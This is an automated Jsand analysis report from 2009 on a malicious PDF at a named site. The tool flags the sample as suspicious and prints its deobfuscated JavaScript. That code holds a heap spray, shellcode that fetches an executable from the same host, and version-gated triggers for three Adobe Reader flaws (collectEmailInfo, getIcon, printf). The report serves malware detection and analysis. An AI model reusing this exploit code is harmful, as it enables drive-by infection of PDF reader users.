Analysis report for http://ogzhnsltk.com/plugins/pdf.php
Sample Overview
| URL | http://ogzhnsltk.com/plugins/pdf.php |
|---|---|
| MD5 | 85102650c24366f20be07642b58e7b23 |
| Analysis Started | 2009-06-30 07:17:41 |
| Report Generated | 2009-06-30 07:17:50 |
| Jsand version | 1.03.02 |
See the report for domain ogzhnsltk.com.
Detection results
| Detector | Result |
| Jsand 1.03.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
var obKhb0FBfRbnsacc = new Array();
var wGqJ0WXg7xjNALQu;
function NkcYurkZILNBw1ni(se3QBZ7IWpfhA7b8, BDfl6PKOkhZgiNPy){
while (se3QBZ7IWpfhA7b8.length * 2 < BDfl6PKOkhZgiNPy){
se3QBZ7IWpfhA7b8 += se3QBZ7IWpfhA7b8;
}
se3QBZ7IWpfhA7b8 = se3QBZ7IWpfhA7b8.substring(0, BDfl6PKOkhZgiNPy / 2);
return se3QBZ7IWpfhA7b8;
}
function DROD2VVXLBEWHqd9(AIt0hEXRv89eVYcX){
var Q2l2XHZsSoOke2si = 0x0c0c0c0c;
var Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
if (AIt0hEXRv89eVYcX == 1){
Q2l2XHZsSoOke2si = 0x30303030;
Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
}
else if (AIt0hEXRv89eVYcX == 2){
Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
}
var ZLClcle6Z4pE5iwO = 0x400000;
var opQUFtQnW1qgDQrS = Mms21QTwXca3ACaA.length * 2;
var BDfl6PKOkhZgiNPy = ZLClcle6Z4pE5iwO - (opQUFtQnW1qgDQrS + 0x38);
var se3QBZ7IWpfhA7b8 = unescape("%u9090%u9090");
se3QBZ7IWpfhA7b8 = NkcYurkZILNBw1ni(se3QBZ7IWpfhA7b8, BDfl6PKOkhZgiNPy);
var U4EPpsUOvKc13ZPX = (Q2l2XHZsSoOke2si - 0x400000) / ZLClcle6Z4pE5iwO;
for (var tq2ejSRGTIwhjo0V = 0; tq2ejSRGTIwhjo0V < U4EPpsUOvKc13ZPX; tq2ejSRGTIwhjo0V ++ ){
obKhb0FBfRbnsacc[tq2ejSRGTIwhjo0V] = se3QBZ7IWpfhA7b8 + Mms21QTwXca3ACaA;
}
}
function YOuhGP6CjiDmHcJg(){
var cLLCnnSH6PzoD0J7 = 0;
var qEnodt1NcD0tqSaJ = app.viewerVersion.toString();
app.clearTimeOut(wGqJ0WXg7xjNALQu);
if (qEnodt1NcD0tqSaJ < 7.1){
DROD2VVXLBEWHqd9(0);
var IvVciytoNscb3wiZ = unescape("%u0c0c%u0c0c");
while (IvVciytoNscb3wiZ.length < 44952)IvVciytoNscb3wiZ += IvVciytoNscb3wiZ;
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : IvVciytoNscb3wiZ
}
);
}
if (qEnodt1NcD0tqSaJ >= 9){
try {
if (app.doc.Collab.getIcon){
DROD2VVXLBEWHqd9(2);
var XWNoPOB2cLvToWmc = unescape("%09");
while (XWNoPOB2cLvToWmc.length < 0x4000)XWNoPOB2cLvToWmc += XWNoPOB2cLvToWmc;
XWNoPOB2cLvToWmc = "N." + XWNoPOB2cLvToWmc;
app.doc.Collab.getIcon(XWNoPOB2cLvToWmc);
cLLCnnSH6PzoD0J7 = 1;
}
else {
cLLCnnSH6PzoD0J7 = 1;
}
}
catch (e){
cLLCnnSH6PzoD0J7 = 1;
}
if (cLLCnnSH6PzoD0J7 == 1){
if ((qEnodt1NcD0tqSaJ >= 7.1 && qEnodt1NcD0tqSaJ < 9)){
DROD2VVXLBEWHqd9(1);
var ZIEBG8ze1bG3Xyci = "12999999999999999999";
for (d1WuOiw24sUsOGUr = 0; d1WuOiw24sUsOGUr < 276; d1WuOiw24sUsOGUr ++ ){
ZIEBG8ze1bG3Xyci += "8";
}
util.printf("%45000f", ZIEBG8ze1bG3Xyci);
}
}
}
}
app.bi3pq2UrdluBkWtF = YOuhGP6CjiDmHcJg;
wGqJ0WXg7xjNALQu = app.setTimeOut("app.bi3pq2UrdluBkWtF()", 10);
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
| http://ogzhnsltk.com/plugins/pdf.php | 200 | application/pdf |
Redirects
No redirects.
ActiveX controls
No objects/controls.
Shellcode and Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://ogzhnsltk.com/plugins/getexe.php | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | c40ae98cb5ebb21b8a6cc59afce3502c | |